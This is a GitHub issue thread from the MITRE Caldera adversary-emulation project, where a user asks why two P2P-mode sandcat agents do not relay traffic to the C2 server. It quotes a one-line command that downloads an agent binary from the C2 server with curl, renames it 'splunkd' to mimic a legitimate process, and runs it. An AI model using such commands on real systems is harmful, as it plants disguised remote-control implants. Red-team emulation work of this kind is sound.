### ISSUE TITLE
How to set known peers parameters when deploying p2p agents 

### ISSUE THREAD

**Issue by zhangyuchaoxjtu** [mitre/caldera#2694]
I deployed two agents with p2p mode, and I used following commands: 

server="http://10.1.1.1:8888";curl -s -X POST -H "file:sandcat.go" -H "platform:linux" -H "gocat-extensions:proxy_http" -H "includeProxyPeers:HTTP" $server/file/download > splunkd;chmod +x splunkd;./splunkd -server $server -listenP2P -v

but this didn't work, the two agents cannot communicate to c2 server through the other peer when they cannot communicate to c2 server directly.
In my log, I find that the two peers' uptream destination are all c2 server's address( 10.1.1.1:8888).

**Comment by elegantmoose** [comment]
@yee-jonathan @uruwhy - Any idea here?

**Comment by elegantmoose** [comment]
@zhangyuchaoxjtu Still having this issue?

**Comment by elegantmoose** [comment]
@zhangyuchaoxjtu - Reopen if still having issue.
